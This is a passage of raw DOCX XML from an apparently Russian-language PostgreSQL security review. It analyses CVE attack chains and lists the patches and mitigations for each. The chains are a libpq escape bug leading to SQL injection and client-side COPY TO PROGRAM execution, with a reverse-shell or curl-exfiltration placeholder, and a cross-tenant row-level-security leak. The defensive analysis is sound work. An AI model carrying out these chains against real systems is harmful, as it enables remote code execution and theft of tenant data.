        <w:t xml:space="preserve"> (byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> начинает 2-байтовую UTF-8 sequence, но второй байт отсутствует или невалиден).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Wrapper-приложение вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral</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PQescapeString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PQescapeIdentifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) на этой строке. Из-за бага в pre-fix libpq escape-функция неверно интерпретирует byte sequence — quote-character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на границе невалидной sequence не получает удвоения, escape перестаёт работать для остатка строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Результат escape-вызова попадает в команду, которая фид-ится в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -c "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, через stdin, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> script). На psql-уровне поломанный escape даёт SQL injection — payload-атакующего trecutează в SQL-контекст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Через injection атакующий пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY (SELECT '') TO PROGRAM 'bash -c "&lt;reverse shell или curl exfil&gt;"';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или другую вариацию с TO PROGRAM-командой).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполняется в OS-контексте процесса, под которым работает psql — обычно admin/operator/DBA workstation user. RCE на машине </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">клиента</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не сервера PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный privilege для старта.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Атакующий должен контролировать строку, попадающую в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescape*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. В BeyondTrust сценарии — это unauthenticated input через web UI (CVE-2024-12356 → CVE-2025-1094 chain, см. Rapid7 advisory).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует цепочку.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R6 fix (17.3, 16.7, 15.11, 14.16, 13.19 — 13.02.2025)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — patch escape-функций, цепочка рвётся на шаге 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Запрет `COPY TO PROGRAM` на клиенте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: невозможно (psql — клиент, не сервер; запрет на сервере для роли — тривиально, см. 5.3, но эта атака — на client-side).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Использование `psql --no-psqlrc` + non-interactive режим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не помогает — атака до execution stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-ref.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R6 (3.9.7); R21 (3.7.1 + 3.9.7); Rapid7 disclosure (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7 advisory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) приводит цитату verbatim: «*Rapid7 discovered that in every scenario we tested, a successful exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094 in order to achieve remote code execution*».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка 2: R8 + R9 (CVE-2024-10978 + CVE-2024-10976) — cross-tenant data leak в multi-tenant SaaS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Старт.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-tenant приложение использует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для tenant isolation + RLS policy на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Connection pooling — стандартный pgbouncer / connection pool в приложении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаги цепочки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Tenant A делает запрос → backend получает connection из pool → выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → SELECT с RLS-проверкой → план кэшируется в plan-cache бэкенда вместе с RLS-фильтром, привязанным к user ID tenant_a.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Connection возвращается в pool; backend выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCARD ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — но R8 (CVE-2024-10978) ломает reset path: на некоторых code-paths (особенно с одновременным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) user ID частично сбрасывается, но не полностью. Plan-cache не invalidated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tenant B получает тот же connection из pool → backend выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но из-за R8 user ID в session не обновляется корректно. Часть session state остаётся в состоянии tenant_a.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenant B делает SELECT с subquery / CTE / security invoker view / SQL-language function — что-то, что триггерит R9 (CVE-2024-10976). RLS-фильтр пере-используется из кэша (от tenant_a) для строк, фильтруемых subquery-стадии → tenant B видит данные tenant A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Усиление: R8 без R9 даёт частичный priv-esc сам по себе (3.13.1); R9 без R8 — кэширование plan-а под одной ролью при отсутствии reset не критично, потому что DISCARD ALL обычно работает корректно. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вместе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в одном patch-окне (14.11.2024) — direct cross-tenant data leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tenant role с legitimate доступом к собственным rows. Никаких extension / function creation prerequisites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует цепочку.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R8 fix (17.1 batch 14.11.2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — reset path исправлен, шаг 2/3 не материализуется.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R9 fix (17.1 batch 14.11.2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS-фильтр пере-вычисляется при смене user, шаг 4 не работает.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Оба в одном patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — upgrade на 17.1/16.5/15.9/14.14/13.17/12.21 закрывает целиком.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`SET LOCAL` вместо `SET`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — частично помогает (см. 3.17.3), потому что transaction-bound.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Уникальные сессии вместо pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывает (но performance impact).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`FORCE ROW LEVEL SECURITY` + `bypassrls = false` на application role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-ref.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R8: 3.13.1 (priv-esc оптика), 3.17.3 (data-leak оптика). R9: 3.17.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка 3: R16 → R7 (CVE-2022-2625 → CVE-2024-10979) — permanent backdoor через extension hijack + plperl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Старт.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Атакующий имеет CREATE на схеме (типичный grant для application role в multi-tenant). PostgreSQL версия — до CVE-2022-2625 fix (14.5 / 13.8 / 12.12 от 11.08.2022).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаги цепочки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
